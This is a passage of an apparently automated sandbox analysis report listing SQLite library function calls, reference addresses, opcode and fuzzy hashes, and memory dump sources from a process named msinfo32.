                                                                                                              • Opcode Fuzzy Hash: dbd0f4d50b9bdc0282d974cbbb6a44a7691d04eb7163e8f1e27f517c76d4f7f3
                                                                                                              • Instruction Fuzzy Hash: AE515B70604381DFEB24CFA9C0A0A9A7BF1AF99318F24C56DE8998F355D730D881CB51
                                                                                                              APIs
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3B463
                                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E3B475
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3B48B
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3B499
                                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E3B57B
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3B586
                                                                                                              • sqlite3_result_error_code.SQLITE3 ref: 61E3B59C
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_text$sqlite3_freesqlite3_result_errorsqlite3_result_error_codesqlite3_result_textsqlite3_value_int
                                                                                                              • String ID:
                                                                                                              • API String ID: 2838836587-0
                                                                                                              • Opcode ID: 9f063eeeace50698a316b2cc48916aaba677a574a927e4e990cb6dec4ea98a65
                                                                                                              • Instruction ID: 302bb9082968ad6d5be3c86c56eed102e130b8e86f0936d6dbb57578c8947aa2
                                                                                                              • Opcode Fuzzy Hash: 9f063eeeace50698a316b2cc48916aaba677a574a927e4e990cb6dec4ea98a65
                                                                                                              • Instruction Fuzzy Hash: FB5180B49046599FCB00DFA8C484A9DBBF1AF88354F10C92AE899EB354E734D945CF51
                                                                                                              APIs
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_blobsqlite3_value_bytessqlite3_value_text$memcmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 2264764126-0
                                                                                                              • Opcode ID: 5b59bda16fe9de41a044ed88fd8372dc2b10f65afb776848bdcbce30367d95da
                                                                                                              • Instruction ID: 438678d40c098638388b58a688edd10e6380c7c28259150baf368b9bb61e6418
                                                                                                              • Opcode Fuzzy Hash: 5b59bda16fe9de41a044ed88fd8372dc2b10f65afb776848bdcbce30367d95da
                                                                                                              • Instruction Fuzzy Hash: 1D31A675E0865A8BDB00DFA9C4A029DBBF0EF4D354F25C02AD8A99B311D735D8428F51
                                                                                                              APIs
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3CC9B
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3CCCA
                                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E3CCEF
                                                                                                                • Part of subcall function 61E3C59A: sqlite3_mprintf.SQLITE3 ref: 61E3C5AF
                                                                                                                • Part of subcall function 61E3C59A: sqlite3_result_error.SQLITE3 ref: 61E3C5C5
                                                                                                                • Part of subcall function 61E3C59A: sqlite3_free.SQLITE3 ref: 61E3C5CD
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_text$sqlite3_freesqlite3_mprintfsqlite3_result_errorsqlite3_result_error_nomem
                                                                                                              • String ID: insert$set
                                                                                                              • API String ID: 832408550-3711289001
                                                                                                              • Opcode ID: 7b39fc057c183d24c9d572c934f227bb7bbed41f593b906431a50ac4dad9374e
                                                                                                              • Instruction ID: 89c357172efc995e1c98afb6c04bcb3ae3c6c8c652ec8594c65fe3b18d9e123c
                                                                                                              • Opcode Fuzzy Hash: 7b39fc057c183d24c9d572c934f227bb7bbed41f593b906431a50ac4dad9374e
                                                                                                              • Instruction Fuzzy Hash: 2731A170B042699BDB01DF68C488B9DBFF5AFC4318F24C41AE8949B354DB35E841CB01
                                                                                                              APIs
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E37153
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E371B6
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_result_error
                                                                                                              • String ID: J
                                                                                                              • API String ID: 497837271-1141589763
                                                                                                              • Opcode ID: 1737f90baf50d2521ae1dc593781d909eda5858255945ce187c6c64706f916a3
                                                                                                              • Instruction ID: 5343296fe35a787279309ef8cc65f4154ccb27a4d6b602c0dc26de6391555b11
                                                                                                              • Opcode Fuzzy Hash: 1737f90baf50d2521ae1dc593781d909eda5858255945ce187c6c64706f916a3
                                                                                                              • Instruction Fuzzy Hash: C7316D75A083A5DBDB109F78C884B497BE0AFC5318F20C96CE8998B341C739E945CB81
                                                                                                              APIs
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E36AA3
                                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E36AAD
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E36AD7
                                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E36AE2
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E36B22
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_bytessqlite3_value_text$sqlite3_result_error
                                                                                                              • String ID: null
                                                                                                              • API String ID: 1955785328-634125391
                                                                                                              • Opcode ID: a307b455a7832cc7adbb3807161a7e0f11ec572fab9c87a22e8e8cb3bb02dbc9
                                                                                                              • Instruction ID: 54e59339b9c72135ecaad64148762dcccad46be842a9f6555ebef41c48997ef4
                                                                                                              • Opcode Fuzzy Hash: a307b455a7832cc7adbb3807161a7e0f11ec572fab9c87a22e8e8cb3bb02dbc9
                                                                                                              • Instruction Fuzzy Hash: 931105B2B082A58BD7046E7ED484319FBE1EBC9328F24C57ED5948B350D235C996C782
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E2820F: sqlite3_log.SQLITE3(?,?,?,?,?,61E282C2), ref: 61E2824A
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E2928C
                                                                                                              • sqlite3_value_text16le.SQLITE3 ref: 61E292A0
                                                                                                              • sqlite3_value_text16le.SQLITE3 ref: 61E292CE
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E292E2
                                                                                                              Strings
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_text16le$sqlite3_logsqlite3_mutex_entersqlite3_mutex_leave
                                                                                                              • String ID: bad parameter or other API misuse$out of memory
                                                                                                              • API String ID: 3568942437-948784999
                                                                                                              • Opcode ID: f4945485339147670e4c004698587dc208c807f59d7c688f69dd9b2b3ff93d84
                                                                                                              • Instruction ID: d82afb09e50e9443df222d924f56496f92ec826f9fe5884ffa15b112888f7676
                                                                                                              • Opcode Fuzzy Hash: f4945485339147670e4c004698587dc208c807f59d7c688f69dd9b2b3ff93d84
                                                                                                              • Instruction Fuzzy Hash: 20010076B043914BDB00EFF995D0959BBE8AF55658F25C8ADDD88CF305E730D8408751
                                                                                                              APIs
                                                                                                              • strcmp.MSVCRT ref: 61E3F1A4
                                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E3F1DC
                                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E3F1F5
                                                                                                              • sqlite3_log.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E3F22C
                                                                                                              • sqlite3_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 61E3F245
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3F258
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_logstrcmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 2202632817-0
                                                                                                              • Opcode ID: 337fce496a555f030f46d2f85ad825393adb812bb773da682ffeb852ebda34fe
                                                                                                              • Instruction ID: 08efd15ee68faca80b7c17646d878bfbcca89b55da891f94d866c04f371aa266
                                                                                                              • Opcode Fuzzy Hash: 337fce496a555f030f46d2f85ad825393adb812bb773da682ffeb852ebda34fe
                                                                                                              • Instruction Fuzzy Hash: 17F1F674A042598FDB04CFA9C88079DBBF1BF89318F24C529E859AB349E778D846CF41
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_msize$sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 2585109301-0
                                                                                                              • Opcode ID: 93d25bf053b657a751bd64ffbef9af6981b4b89ab869b0dd51bc65de7b51a19e
                                                                                                              • Instruction ID: bb68ba126c959abcdf33b0796105834b34a27c872dae37dcc740edb6624b39dd
                                                                                                              • Opcode Fuzzy Hash: 93d25bf053b657a751bd64ffbef9af6981b4b89ab869b0dd51bc65de7b51a19e
                                                                                                              • Instruction Fuzzy Hash: CBB114B5A05206CFDB00CF68C48179AB7B1BF8A318F29C469DC59AB349D734E855CF90
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: 5ea8786b782671905a265634706bd2c512d6a86d3f0e66cfbfea1ee712d87fb0
                                                                                                              • Instruction ID: ed39ee10c3f9863965efb34ebd51796b4dc25ca01f3d3cb455a13f5d84e0f0f9
                                                                                                              • Opcode Fuzzy Hash: 5ea8786b782671905a265634706bd2c512d6a86d3f0e66cfbfea1ee712d87fb0
                                                                                                              • Instruction Fuzzy Hash: 968198B4A157168BDF00DFB8C48064DBBF6EB95340F28C929E984CB354E734E981CB92
                                                                                                              APIs
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3BE4D
                                                                                                                • Part of subcall function 61E386AE: sqlite3_initialize.SQLITE3 ref: 61E386B4
                                                                                                                • Part of subcall function 61E386AE: sqlite3_vmprintf.SQLITE3 ref: 61E386CE
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3BF8D
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3BF95
                                                                                                                • Part of subcall function 61E38680: sqlite3_free.SQLITE3 ref: 61E3868F
                                                                                                                • Part of subcall function 61E38680: sqlite3_vmprintf.SQLITE3 ref: 61E386A1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_vmprintf$sqlite3_initializesqlite3_mprintf
                                                                                                              • String ID:
                                                                                                              • API String ID: 2044204354-0
                                                                                                              • Opcode ID: 54c9ab42b0eeb812746ccd390868a0a9b688f45bccd72afc8e5b82b6019f81ed
                                                                                                              • Instruction ID: 0c347f7ab6f7eee9f28b70dae4a8561805db4cfd601dd63803446b3dffee1511
                                                                                                              • Opcode Fuzzy Hash: 54c9ab42b0eeb812746ccd390868a0a9b688f45bccd72afc8e5b82b6019f81ed
                                                                                                              • Instruction Fuzzy Hash: 2B41E470E046599FCB00DFA9C880AAEBBF5AF89304F25C92EE859D7345E735D842CB51
                                                                                                              APIs
                                                                                                              • sqlite3_malloc.SQLITE3 ref: 61E357E3
                                                                                                                • Part of subcall function 61E1923C: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E18EC6,?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E19244
                                                                                                              • memcmp.MSVCRT ref: 61E35855
                                                                                                              • memcmp.MSVCRT ref: 61E3587A
                                                                                                              • memcmp.MSVCRT ref: 61E358A4
                                                                                                              • memcmp.MSVCRT ref: 61E358D3
                                                                                                              • memcmp.MSVCRT ref: 61E358FF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: memcmp$sqlite3_initializesqlite3_malloc
                                                                                                              • String ID:
                                                                                                              • API String ID: 40721531-0
                                                                                                              • Opcode ID: 11721e68a221a4b1f25c428f01716bf07c5395836458da1e41caf455fe9f32cb
                                                                                                              • Instruction ID: f29a8b966ff10d4a9e2124cf652df0a987ea76a0d55ff523c9f6f51c1784dfde
                                                                                                              • Opcode Fuzzy Hash: 11721e68a221a4b1f25c428f01716bf07c5395836458da1e41caf455fe9f32cb
                                                                                                              • Instruction Fuzzy Hash: 2D414EB0A083558BE7049FAAC58035AFBF5EFC5358F25C82ED8988B390D775D585CB42
                                                                                                              APIs
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E22B4C
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E22B5A
                                                                                                              • sqlite3_value_bytes.SQLITE3 ref: 61E22B67
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E22B95
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E22BBF
                                                                                                              • sqlite3_result_int.SQLITE3 ref: 61E22BFF
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_text$sqlite3_result_errorsqlite3_result_intsqlite3_value_bytes
                                                                                                              • String ID:
                                                                                                              • API String ID: 4226599549-0
                                                                                                              • Opcode ID: 385d8339e7263b943fa932d1d9d94d4f70d6dec693843a0a90fb193d35565cc1
                                                                                                              • Instruction ID: 9d91acefac069c2591706e46c683e960ab6d1f18b021c97ef5b79cf00f4f2c6c
                                                                                                              • Opcode Fuzzy Hash: 385d8339e7263b943fa932d1d9d94d4f70d6dec693843a0a90fb193d35565cc1
                                                                                                              • Instruction Fuzzy Hash: D4213A7091474A8FCB10DFB9C494699BBF0AF98324F24C91DE8A99B390D334D941CF51
                                                                                                              APIs
                                                                                                              • sqlite3_reset.SQLITE3 ref: 61E4C79B
                                                                                                                • Part of subcall function 61E4C593: sqlite3_mutex_enter.SQLITE3 ref: 61E4C5B0
                                                                                                                • Part of subcall function 61E4C593: sqlite3_mutex_leave.SQLITE3 ref: 61E4C631
                                                                                                              • sqlite3_finalize.SQLITE3 ref: 61E4C7B1
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C7C6
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C7D0
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C7E4
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E4C7FE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_finalizesqlite3_mutex_entersqlite3_mutex_leavesqlite3_reset
                                                                                                              • String ID:
                                                                                                              • API String ID: 947960732-0
                                                                                                              APIs
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3A04C
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3A07B
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3A090
                                                                                                              • sqlite3_load_extension.SQLITE3 ref: 61E3A0AB
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3A0C6
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3A0D1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_result_errorsqlite3_value_text$sqlite3_freesqlite3_load_extension
                                                                                                              • String ID:
                                                                                                              • API String ID: 356667613-0
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_strglob
                                                                                                              • String ID: $
                                                                                                              • API String ID: 476814121-227171996
                                                                                                              APIs
                                                                                                              • sqlite3_malloc.SQLITE3 ref: 61E19628
                                                                                                                • Part of subcall function 61E1923C: sqlite3_initialize.SQLITE3(00000007,00000007,?,61E18EC6,?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E19244
                                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E19670
                                                                                                              • sqlite3_stricmp.SQLITE3 ref: 61E19697
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E196C5
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_stricmp$sqlite3_freesqlite3_initializesqlite3_malloc
                                                                                                              • String ID: `Pa
                                                                                                              • API String ID: 2308590742-2867136586
                                                                                                              APIs
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3A236
                                                                                                              • sqlite3_value_text.SQLITE3 ref: 61E3A243
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3A273
                                                                                                                • Part of subcall function 61E386AE: sqlite3_initialize.SQLITE3 ref: 61E386B4
                                                                                                                • Part of subcall function 61E386AE: sqlite3_vmprintf.SQLITE3 ref: 61E386CE
                                                                                                              • sqlite3_result_error.SQLITE3 ref: 61E3A289
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_value_text$sqlite3_initializesqlite3_mprintfsqlite3_result_errorsqlite3_vmprintf
                                                                                                              • String ID: after rename
                                                                                                              • API String ID: 473106834-392022782
                                                                                                              APIs
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E1AE12
                                                                                                              • sqlite3_malloc64.SQLITE3 ref: 61E1AEB2
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E1ADD9
                                                                                                                • Part of subcall function 61E09D7B: sqlite3_mutex_enter.SQLITE3 ref: 61E09D9A
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E1B041
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_malloc64sqlite3_mutex_enter
                                                                                                              • String ID:
                                                                                                              • API String ID: 3222813361-0
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_strnicmp
                                                                                                              • String ID:
                                                                                                              • API String ID: 1961171630-0
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,61E48AC2), ref: 61E48840
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,61E48AC2), ref: 61E489CD
                                                                                                              • sqlite3_mutex_free.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,61E48AC2), ref: 61E489DF
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E489F6
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E489FE
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_mutex_leave$sqlite3_mutex_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 2921195555-0
                                                                                                              APIs
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mprintf$sqlite3_freesqlite3_malloc64sqlite3_realloc64
                                                                                                              • String ID:
                                                                                                              • API String ID: 4073198082-0
                                                                                                              APIs
                                                                                                              • sqlite3_result_null.SQLITE3 ref: 61E36E88
                                                                                                              • sqlite3_result_int.SQLITE3 ref: 61E36EA7
                                                                                                              • sqlite3_result_int64.SQLITE3 ref: 61E36F5C
                                                                                                              • sqlite3_result_double.SQLITE3 ref: 61E36F90
                                                                                                              • sqlite3_malloc.SQLITE3 ref: 61E36FCD
                                                                                                              • sqlite3_result_text.SQLITE3 ref: 61E37076
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mallocsqlite3_result_doublesqlite3_result_intsqlite3_result_int64sqlite3_result_nullsqlite3_result_text
                                                                                                              • String ID:
                                                                                                              • API String ID: 402655203-0
                                                                                                              APIs
                                                                                                              • sqlite3_value_int.SQLITE3 ref: 61E3A2CF
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3A38A
                                                                                                              • sqlite3_result_error_nomem.SQLITE3 ref: 61E3A398
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3A3BA
                                                                                                              • sqlite3_result_double.SQLITE3 ref: 61E3A3C9
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_freesqlite3_mprintfsqlite3_result_doublesqlite3_result_error_nomemsqlite3_value_int
                                                                                                              • String ID:
                                                                                                              • API String ID: 2195261611-0
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E13D7F: sqlite3_mutex_try.SQLITE3(?,?,?,61E13DFF), ref: 61E13D1F
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E48769
                                                                                                              • sqlite3_mutex_free.SQLITE3 ref: 61E487AA
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E487BA
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E487E9
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E48808
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_free$sqlite3_mutex_entersqlite3_mutex_freesqlite3_mutex_leavesqlite3_mutex_try
                                                                                                              • String ID:
                                                                                                              • API String ID: 1894464702-0
                                                                                                              APIs
                                                                                                              • sqlite3_log.SQLITE3 ref: 61E283CC
                                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,61E284E7), ref: 61E283E0
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E284E7), ref: 61E28408
                                                                                                              • sqlite3_log.SQLITE3 ref: 61E28426
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,61E284E7), ref: 61E2845C
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_logsqlite3_mutex_leave$sqlite3_mutex_enter
                                                                                                              • String ID:
                                                                                                              • API String ID: 1015584638-0
                                                                                                              APIs
                                                                                                              • sqlite3_str_appendf.SQLITE3 ref: 61E32113
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E32146
                                                                                                              • sqlite3_str_appendall.SQLITE3 ref: 61E32160
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E32178
                                                                                                              • sqlite3_str_appendall.SQLITE3 ref: 61E32184
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_str_appendsqlite3_str_appendall$sqlite3_str_appendf
                                                                                                              • String ID:
                                                                                                              • API String ID: 3231710329-0
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E48574
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E4857F
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E48638
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E48643
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave
                                                                                                              • String ID:
                                                                                                              • API String ID: 1477753154-0
                                                                                                              APIs
                                                                                                              • sqlite3_initialize.SQLITE3 ref: 61E37B10
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_enter.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E18D2E
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_config.SQLITE3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,61E20D02), ref: 61E18D62
                                                                                                                • Part of subcall function 61E18CF7: sqlite3_mutex_leave.SQLITE3(?,?,?,?,?,?,00000000,?,?,?,61E1CD30), ref: 61E1903A
                                                                                                              • sqlite3_mutex_enter.SQLITE3 ref: 61E37B28
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E37B4B
                                                                                                              • sqlite3_mutex_leave.SQLITE3 ref: 61E37B8F
                                                                                                              • sqlite3_memory_used.SQLITE3 ref: 61E37B94
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_leave$sqlite3_mutex_enter$sqlite3_configsqlite3_initializesqlite3_memory_used
                                                                                                              • String ID:
                                                                                                              • API String ID: 2853221962-0
                                                                                                              APIs
                                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,61E1472E), ref: 61E0AAD9
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,61E1472E), ref: 61E0AB15
                                                                                                              • sqlite3_mutex_enter.SQLITE3(?,?,?,61E1472E), ref: 61E0AB2E
                                                                                                              • sqlite3_mutex_leave.SQLITE3(?,?,?,61E1472E), ref: 61E0AB41
                                                                                                              • sqlite3_free.SQLITE3(?,?,?,61E1472E), ref: 61E0AB49
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_mutex_entersqlite3_mutex_leave$sqlite3_free
                                                                                                              • String ID:
                                                                                                              • API String ID: 251237202-0
                                                                                                              APIs
                                                                                                                • Part of subcall function 61E326FD: sqlite3_realloc64.SQLITE3(?,?,?,?,?,?,?,?,?,?,00000000,00000001,00000000,?,61E32B0A), ref: 61E32650
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E32CFB
                                                                                                              • sqlite3_log.SQLITE3 ref: 61E32D7C
                                                                                                                • Part of subcall function 61E090C5: memcmp.MSVCRT ref: 61E0911F
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcmpsqlite3_freesqlite3_logsqlite3_realloc64
                                                                                                              • String ID:
                                                                                                              • API String ID: 167025251-3916222277
                                                                                                              APIs
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E21041
                                                                                                              • sqlite3_str_append.SQLITE3 ref: 61E21078
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: sqlite3_str_append
                                                                                                              • String ID: $,
                                                                                                              • API String ID: 1074250351-71045815
                                                                                                              APIs
                                                                                                              • sqlite3_mprintf.SQLITE3 ref: 61E3B0A1
                                                                                                              • sqlite3_free.SQLITE3 ref: 61E3B0CD
                                                                                                                • Part of subcall function 61E3AE97: sqlite3_vmprintf.SQLITE3 ref: 61E3AEB0
                                                                                                                • Part of subcall function 61E3AE97: sqlite3_mprintf.SQLITE3 ref: 61E3AECE
                                                                                                                • Part of subcall function 61E3AE97: sqlite3_free.SQLITE3 ref: 61E3AEDA
                                                                                                                • Part of subcall function 61E3AE97: sqlite3_free.SQLITE3 ref: 61E3AEE2
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 0000000C.00000002.874603371.0000000061E01000.00000020.00000001.01000000.0000000C.sdmp, Offset: 61E00000, based on PE: true
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_12_2_61e00000_msinfo32.jbxd
                                                                                                              Similarity
